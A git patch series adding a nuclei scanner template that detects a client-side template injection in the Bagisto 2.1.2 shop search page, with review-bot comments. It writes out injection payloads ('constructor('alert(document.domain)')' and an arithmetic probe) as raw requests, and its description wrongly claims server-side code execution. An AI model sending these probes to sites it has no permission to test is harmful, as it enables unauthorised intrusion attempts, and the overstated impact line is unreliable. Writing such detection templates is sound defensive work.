From 96e47552d1caa4d21c578b4e0709232bea78a9d9 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Mon, 24 Jun 2024 16:51:36 +0300
Subject: [PATCH 1/3] add bagisto csti vuln

---
 http/vulnerabilities/other/bagisto-csti.yaml | 31 ++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 http/vulnerabilities/other/bagisto-csti.yaml

diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml
new file mode 100644
index 0000000000..1d8436c9d7
--- /dev/null
+++ b/http/vulnerabilities/other/bagisto-csti.yaml
@@ -0,0 +1,31 @@
+id: bagisto-csti
+
+info:
+ name: Bagisto 2.1.2 Client-Side Template Injection
+ author: securityforeveryone
+ severity: medium
+ description: |
+ Bagisto is vulnerable to Client-Side Template Injection (CSTI), which allows an attacker to execute arbitrary code on the server.
+ reference:
+ - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html
+ - https://demo.bagisto.com/
+ tags: packetstorm,bagisto,csti
+
+http:
+ - raw:
+ - |
+ GET /search?query={{_openBlock.constructor('alert(document.domain)')()}} HTTP/1.1
+ Host: {{Hostname}}
+
+ - raw:
+ - |
+ GET /search?query={{-function(){this.alert(document.domain)}()}} HTTP/1.1
+ Host: {{Hostname}}
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body,"alert(document.domain)","Search results")'
+ - 'status_code==200'
+ condition: and
\ No newline at end of file

From a5405d91f4aabb5ac4613b36f49f1b1c10a86ca9 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Mon, 24 Jun 2024 16:53:00 +0300
Subject: [PATCH 2/3] fix

---
 http/vulnerabilities/other/bagisto-csti.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml
index 1d8436c9d7..c4d4620ed2 100644
--- a/http/vulnerabilities/other/bagisto-csti.yaml
+++ b/http/vulnerabilities/other/bagisto-csti.yaml
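Review bot: The `description` line of the new file states that the CSTI "allows an attacker to execute arbitrary code on the server", but a client-side template injection is evaluated in the visiting user's browser, so the wording overstates the impact and does not match the `alert(document.domain)` probe the template sends; suggest `Bagisto 2.1.2 is vulnerable to Client-Side Template Injection (CSTI): template expressions supplied in the search query are evaluated in the visitor's browser, allowing script execution in the context of the site.` The two `- raw:` entries are separate request blocks and only the second one carries `matchers`, so the first request can never produce a finding. The dsl matcher also only checks that the literal payload text is echoed back next to `Search results`, which any page that reflects the search term verbatim would satisfy whether or not the expression was evaluated, so a probe whose computed result is matched would be a more reliable indicator than matching the input itself.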
@@ -28,4 +28,4 @@ http:
 dsl:
 - 'contains_all(body,"alert(document.domain)","Search results")'
 - 'status_code==200'
- condition: and
\ No newline at end of file
+ condition: and

From c7c7759329263ec28af14f88ea4d51ea757fe26b Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 27 Jun 2024 16:02:22 +0530
Subject: [PATCH 3/3] minor update

---
 http/vulnerabilities/other/bagisto-csti.yaml | 33 +++++++++++---------
 1 file changed, 18 insertions(+), 15 deletions(-)

diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml
index c4d4620ed2..96ae031696 100644
--- a/http/vulnerabilities/other/bagisto-csti.yaml
+++ b/http/vulnerabilities/other/bagisto-csti.yaml
@@ -9,23 +9,26 @@ info:
 reference:
 - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html
 - https://demo.bagisto.com/
- tags: packetstorm,bagisto,csti
+ metadata:
+ fofa-query: "Bagisto"
+ max-request: 1
+ tags: bagisto,csti,packetstorm,ssti

 http:
- - raw:
- - |
- GET /search?query={{_openBlock.constructor('alert(document.domain)')()}} HTTP/1.1
- Host: {{Hostname}}
+ - method: GET
+ path:
+ - "{{BaseURL}}/bagisto-common/search?query={{228*'98'}}"

- - raw:
- - |
- GET /search?query={{-function(){this.alert(document.domain)}()}} HTTP/1.1
- Host: {{Hostname}}
-
- stop-at-first-match: true
+ matchers-condition: and
 matchers:
- - type: dsl
- dsl:
- - 'contains_all(body,"alert(document.domain)","Search results")'
- - 'status_code==200'
+ - type: word
+ part: body
+ words:
+ - "22344"
+ - "bagisto"
 condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - "text/html"
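Review bot: The new `path` entry hardcodes `/bagisto-common/search`, which looks like the demo site's URL prefix rather than the default route, while the PoC requests removed in this same hunk used `/search?query=`, so self-hosted installs serving the default route would not be exercised; consider probing both, adding `- "{{BaseURL}}/search?query={{228*'98'}}"` next to the existing path with `max-request: 2` and `stop-at-first-match: true`. If nuclei's own expression engine evaluates `{{...}}` in paths before the request is sent, `{{228*'98'}}` may not reach the target with its braces intact; confirm the request on the wire, or URL-encode the braces (`%7B%7B228*'98'%7D%7D`) to keep them literal. Matching the computed `22344` is a sound evaluation check, but the bare word `"bagisto"` in the body is a weak product fingerprint and a short `"Search results"`-style page marker would tighten it. The `info.description` outside this hunk still says the issue allows code execution on the server, which a client-side injection does not.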